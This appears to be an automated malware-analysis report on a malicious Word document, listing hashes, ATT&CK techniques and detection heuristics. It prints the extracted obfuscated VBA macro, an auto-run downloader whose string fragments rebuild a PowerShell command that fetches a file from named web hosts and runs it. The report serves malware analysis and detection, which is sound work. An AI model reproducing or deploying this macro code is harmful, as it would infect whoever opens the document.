Office (OLE) malware analysis — malicious · 65ae5c0e9abc9f14

MALICIOUS

Office (OLE)

148.5 KB Created: 2017-12-06 17:01:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: e9c7984e38699c1e43ed8564653ffa44 SHA-1: f227924837f4a896fb98706680e12e214e662577 SHA-256: 65ae5c0e9abc9f14e05db6ea1fd31c1b3a9a62e6b2e68f2355c00a02ef49ed2f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The critical OLE_VBA_SHELL heuristic indicates the presence of a Shell() call within the VBA macros, and the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic further confirms this auto-execution with execution tokens. The script attempts to download a payload from the reconstructed URL 'http://achar-tech.com/aIwM/'. This strongly suggests a macro-based downloader designed to execute further malicious content.

Heuristics 7

ClamAV: Doc.Macro.Obfuscation-6394109-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 55123 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	55123 bytes
SHA-256: `7e560b5ed7bd89654d2410f0e535e939b5bb18d7f8462a1e9cef57b2e33969f2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "EQkYTQZMUP" Function jKwnsPwmjVchZ() FNHINDLsQtI = Array(UCase("ivdYnBDiBTY" + "mcLmbQYLzEiYa" + "uzbdMwslP" + "dkHUofWX" + "lSqdKjnkijZQE")) dwlYZTcl = Mid("1SRwLJuJFlJON6pNCiCz3DXZa071smEUOKcspemenankKc+kKcg.comkKc+EUO+EUOkKc/kKc+kKcMAkKc+kKchq/,'+'h'+'tt'+'p:/kKc+EUO+EUOkKc/wwwEUO+EUO.achar-tehrkKc+kKc'+'an.kKEUO+EUOc+kKccom/aIwM/,hkKc+kKctjwM5SpKvv", 31, 157) KllJsiVCR = Array(UCase("UdGPpCpjd" + "EWPtjKuEIcV" + "ETNmYoQEnRuEG" + "uVsJXrRi" + "TpzLDIu")) UBXjujihTP = Array(UCase("ZHGCXGbABMDJqI" + "XTiGfpv" + "TRtZMKE" + "rYmiNicwRRkQd" + "AtijLMrJZId")) CkFNZ = Array(UCase("ULDzduUi" + "jrGZdlaWjtzP" + "LLLTdAL" + "qcVpNnaFfBWqz" + "CMhldOhJd")) JOTsD = Mid("VzdCvjRhsdEwBjqUjlw02),[StrIng][cH'+'ar]39).rePlaCE(([cHar'+']HpE7hIb", 21, 42) RNzvrEjzau = Array(UCase("mlihPqz" + "LlEaqorjpN" + "iZsQAuj" + "rwhzdEJvrUjCtT" + "PPoDpWV")) fzSmMIjcdBi = Array(UCase("sOzsnKQTSv" + "PkjQwARBrdZIt" + "wmsXzJhw" + "zzohRVk" + "XBZmcwV")) rJzzWcXfNGz = Array(UCase("QciRRwmNTkBFms" + "DcIXcVXiuVzsG" + "ibSVodw" + "qMvukINKAPWZ" + "PEjtZsukv")) qvocsBluIjI = Mid("0pEFBti4HVG9azzbkEUO+EUOKcreak;}catch{writkKc+kKce-hoskKc+kKctkKc+'+'kKc RJPkKc+kKc_.'+'ExckK6kK0Z9ZFnwBuPTZkDr", 17, 77) WIlRmGqb = Array(UCase("NQHlsTFGjpY" + "wVmMQklRJS" + "fGbBHTWWnWrjtZ" + "HdthzczMF" + "PNWrMEV")) FKYhAa = Array(UCase("FjNoIjjwP" + "VlwchkOVjUkVj" + "PXlcOkCwvupO" + "UEbRRGjzdH" + "LpdZAbh")) MmqXD = Array(UCase("phEWwziskn" + "KzJPYzW" + "FwzkMvIzNV" + "CiAQQjnEkK" + "fijzlnMBQ")) NkljcRmATlo = Mid("5zJEXtcTpKcEUO+EUOskKc+kKcukKc+kKcsa.ckKc+kKcok'+'Kc+kEU'+'O+E'+'UOKcm/wRhkKcEUbS", 10, 70) dcXICSd = Array(UCase("zfYlzGjfoXqB" + "TNuQIDSPzkmPh" + "YGczUMFOr" + "TdKhbuamGRsbjI" + "XPUCvmVQpKYLZ")) wwwNAqmBhX = Array(UCase("BrUaszrbq" + "RWNlUJi" + "fkslJrQSDNKUl" + "FJBrjqYm" + "duKwIQvibFTVfU")) ubbOXHJiatL = Array(UCase("hCYlviFzOsPw" + "ZMVAWCREEQ" + "vjkDTPijMaWdZ" + "WiUwbwzN" + "YAdaUCGicmkq")) zcQGdF = Mid("qmCe(([CHar]69+[CHar]85+[CHar]79),[strINg][CHar]39).rEPlaCe(([CHar]114+[CHar]104+[CHar]103),'\|').rEPlaCe('OAE',[strCwhmjzqQiLzbDr4WS8kNMBjIDIj3Tdd", 3, 113) OqVtNUqVTrq = Array(UCase("hcJZtdQVP" + "REkcdsU" + "oPrzvHBHiiPSqZ" + "lJDjwsSMZvqrM" + "CwMwbqFY")) vSdAELoXk = Array(UCase("zCizJfmtD" + "vtzXzGdRqiwM" + "poOhGwt" + "pQIhRTcpSbpVS" + "jUiIYzUtHQlz")) TRvwhH = Array(UCase("YOTJTwuNGkhD" + "QiIhDPOU" + "wibJkBDAMsZM" + "zJSjitPfNK" + "nrPGwzlhN")) lvTrViazirS = Mid("wp0nZSc+kKc--prppwkVGij5TbPZw", 7, 8) DJQitoWLZD = Array(UCase("LvzfwJqFdrqjm" + "bYHIqkI" + "tCzXuXwJ" + "vSfQuUvsLcbDd" + "cmwsUzHuOfDBv")) YqwapYB = Array(UCase("SohKOtKFXpizw" + "zPUlUFGiTKWt" + "zCNGrwjfUkZQ" + "FZqVnnuhHjfAMI" + "jUWoUIMDKimA")) VVtpFZzvSo = Array(UCase("MKWvUYNO" + "anhzEcOfamVlDL" + "bOYzobHNApfNc" + "AjJVjBTd" + "CCCdzrmYI")) fcDzGMRmkD = Mid("zKYn74hC4VVk1H0Rs0KPvcQYIanC6{try{RJPk'+'Kc+k'+'Kcfranc.Downk'+'K'+'c+kKcloadFileEUO+EUO(RJEUO+EUOPabckKc+k'+'K'+'c.ToString(),kKc+kKc '+'RJPhuakKc+kKcskKc+kKc)kKc+kKc;kKc+k'+'KcInvoke-Item(RJPhuas)kKc+kKc;bkKc+YNrvGpv", 30, 182) BaZAmn = Array(UCase("CiiuUVAjs" + "XizDpThGfqzvzN" + "wrsWjnAmifcE" + "jrIArXzFVEXk" + "bHKQHfQJYdI")) KwftlbN = Array(UCase("dTGzQZVSahJZPl" + "ZGLPWKZwzV" + "mwJWNRWOzpujsw" + "itwHdnQH" + "lbImnDVJiW")) ACqkqwtWXKd = Array(UCase("ZpMtXwLWB" + "abRUqQsZiTJOY" + "SQHqIDW" + "iHMpOzoLiDKfsr" + "vbPdsDRJKQ")) uJEhzf = Mid("AFhjLRNWzCLBwc+k'+'Kcch(RJPabkKc+kKcc in RJPkKc+kKcbkKc+kKccd)Aq", 14, 49) TpzhjBq = Array(UCase("WIDTsCAljfZST" + "bjCqrGVq" + "lmIkavUlCWIo" + "pcOamfasLI" + "aLWTTmPRfWShk")) fbBJmSKaq = Array(UCase("bHpUOwUf" + "JHABtlSoFEtIau" + "PtZirNwB" + "DXhWJpLLNu" + "naNjHlcE")) fWFHuRt = Array(UCase("MpIVdEQqjThwQ" + "bzAiCavH" + "VUirqPbSQ" + "GiLsAspniCArM" + "XWRNUnWsFbmB")) SVZSdY = Mid("XJ4jzTAqlb-JOiN'') ( ('((EUO. ( Zk5pshO'+' ... (truncated)

SHA-256: 7e560b5ed7bd89654d2410f0e535e939b5bb18d7f8462a1e9cef57b2e33969f2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "EQkYTQZMUP"
Function jKwnsPwmjVchZ()
FNHINDLsQtI = Array(UCase("ivdYnBDiBTY" + "mcLmbQYLzEiYa" + "uzbdMwslP" + "dkHUofWX" + "lSqdKjnkijZQE"))
dwlYZTcl = Mid("1SRwLJuJFlJON6pNCiCz3DXZa071smEUOKcspemenankKc+kKcg.comkKc+EUO+EUOkKc/kKc+kKcMAkKc+kKchq/,'+'h'+'tt'+'p:/kKc+EUO+EUOkKc/wwwEUO+EUO.achar-tehrkKc+kKc'+'an.kKEUO+EUOc+kKccom/aIwM/,hkKc+kKctjwM5SpKvv", 31, 157)
KllJsiVCR = Array(UCase("UdGPpCpjd" + "EWPtjKuEIcV" + "ETNmYoQEnRuEG" + "uVsJXrRi" + "TpzLDIu"))
UBXjujihTP = Array(UCase("ZHGCXGbABMDJqI" + "XTiGfpv" + "TRtZMKE" + "rYmiNicwRRkQd" + "AtijLMrJZId"))
CkFNZ = Array(UCase("ULDzduUi" + "jrGZdlaWjtzP" + "LLLTdAL" + "qcVpNnaFfBWqz" + "CMhldOhJd"))
JOTsD = Mid("VzdCvjRhsdEwBjqUjlw02),[StrIng][cH'+'ar]39).rePlaCE(([cHar'+']HpE7hIb", 21, 42)
RNzvrEjzau = Array(UCase("mlihPqz" + "LlEaqorjpN" + "iZsQAuj" + "rwhzdEJvrUjCtT" + "PPoDpWV"))
fzSmMIjcdBi = Array(UCase("sOzsnKQTSv" + "PkjQwARBrdZIt" + "wmsXzJhw" + "zzohRVk" + "XBZmcwV"))
rJzzWcXfNGz = Array(UCase("QciRRwmNTkBFms" + "DcIXcVXiuVzsG" + "ibSVodw" + "qMvukINKAPWZ" + "PEjtZsukv"))
qvocsBluIjI = Mid("0pEFBti4HVG9azzbkEUO+EUOKcreak;}catch{writkKc+kKce-hoskKc+kKctkKc+'+'kKc RJPkKc+kKc_.'+'ExckK6kK0Z9ZFnwBuPTZkDr", 17, 77)
WIlRmGqb = Array(UCase("NQHlsTFGjpY" + "wVmMQklRJS" + "fGbBHTWWnWrjtZ" + "HdthzczMF" + "PNWrMEV"))
FKYhAa = Array(UCase("FjNoIjjwP" + "VlwchkOVjUkVj" + "PXlcOkCwvupO" + "UEbRRGjzdH" + "LpdZAbh"))
MmqXD = Array(UCase("phEWwziskn" + "KzJPYzW" + "FwzkMvIzNV" + "CiAQQjnEkK" + "fijzlnMBQ"))
NkljcRmATlo = Mid("5zJEXtcTpKcEUO+EUOskKc+kKcukKc+kKcsa.ckKc+kKcok'+'Kc+kEU'+'O+E'+'UOKcm/wRhkKcEUbS", 10, 70)
dcXICSd = Array(UCase("zfYlzGjfoXqB" + "TNuQIDSPzkmPh" + "YGczUMFOr" + "TdKhbuamGRsbjI" + "XPUCvmVQpKYLZ"))
wwwNAqmBhX = Array(UCase("BrUaszrbq" + "RWNlUJi" + "fkslJrQSDNKUl" + "FJBrjqYm" + "duKwIQvibFTVfU"))
ubbOXHJiatL = Array(UCase("hCYlviFzOsPw" + "ZMVAWCREEQ" + "vjkDTPijMaWdZ" + "WiUwbwzN" + "YAdaUCGicmkq"))
zcQGdF = Mid("qmCe(([CHar]69+[CHar]85+[CHar]79),[strINg][CHar]39).rEPlaCe(([CHar]114+[CHar]104+[CHar]103),'|').rEPlaCe('OAE',[strCwhmjzqQiLzbDr4WS8kNMBjIDIj3Tdd", 3, 113)
OqVtNUqVTrq = Array(UCase("hcJZtdQVP" + "REkcdsU" + "oPrzvHBHiiPSqZ" + "lJDjwsSMZvqrM" + "CwMwbqFY"))
vSdAELoXk = Array(UCase("zCizJfmtD" + "vtzXzGdRqiwM" + "poOhGwt" + "pQIhRTcpSbpVS" + "jUiIYzUtHQlz"))
TRvwhH = Array(UCase("YOTJTwuNGkhD" + "QiIhDPOU" + "wibJkBDAMsZM" + "zJSjitPfNK" + "nrPGwzlhN"))
lvTrViazirS = Mid("wp0nZSc+kKc--prppwkVGij5TbPZw", 7, 8)
DJQitoWLZD = Array(UCase("LvzfwJqFdrqjm" + "bYHIqkI" + "tCzXuXwJ" + "vSfQuUvsLcbDd" + "cmwsUzHuOfDBv"))
YqwapYB = Array(UCase("SohKOtKFXpizw" + "zPUlUFGiTKWt" + "zCNGrwjfUkZQ" + "FZqVnnuhHjfAMI" + "jUWoUIMDKimA"))
VVtpFZzvSo = Array(UCase("MKWvUYNO" + "anhzEcOfamVlDL" + "bOYzobHNApfNc" + "AjJVjBTd" + "CCCdzrmYI"))
fcDzGMRmkD = Mid("zKYn74hC4VVk1H0Rs0KPvcQYIanC6{try{RJPk'+'Kc+k'+'Kcfranc.Downk'+'K'+'c+kKcloadFileEUO+EUO(RJEUO+EUOPabckKc+k'+'K'+'c.ToString(),kKc+kKc '+'RJPhuakKc+kKcskKc+kKc)kKc+kKc;kKc+k'+'KcInvoke-Item(RJPhuas)kKc+kKc;bkKc+YNrvGpv", 30, 182)
BaZAmn = Array(UCase("CiiuUVAjs" + "XizDpThGfqzvzN" + "wrsWjnAmifcE" + "jrIArXzFVEXk" + "bHKQHfQJYdI"))
KwftlbN = Array(UCase("dTGzQZVSahJZPl" + "ZGLPWKZwzV" + "mwJWNRWOzpujsw" + "itwHdnQH" + "lbImnDVJiW"))
ACqkqwtWXKd = Array(UCase("ZpMtXwLWB" + "abRUqQsZiTJOY" + "SQHqIDW" + "iHMpOzoLiDKfsr" + "vbPdsDRJKQ"))
uJEhzf = Mid("AFhjLRNWzCLBwc+k'+'Kcch(RJPabkKc+kKcc in RJPkKc+kKcbkKc+kKccd)Aq", 14, 49)
TpzhjBq = Array(UCase("WIDTsCAljfZST" + "bjCqrGVq" + "lmIkavUlCWIo" + "pcOamfasLI" + "aLWTTmPRfWShk"))
fbBJmSKaq = Array(UCase("bHpUOwUf" + "JHABtlSoFEtIau" + "PtZirNwB" + "DXhWJpLLNu" + "naNjHlcE"))
fWFHuRt = Array(UCase("MpIVdEQqjThwQ" + "bzAiCavH" + "VUirqPbSQ" + "GiLsAspniCArM" + "XWRNUnWsFbmB"))
SVZSdY = Mid("XJ4jzTAqlb-JOiN'') ( ('((EUO. ( Zk5pshO'+'
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.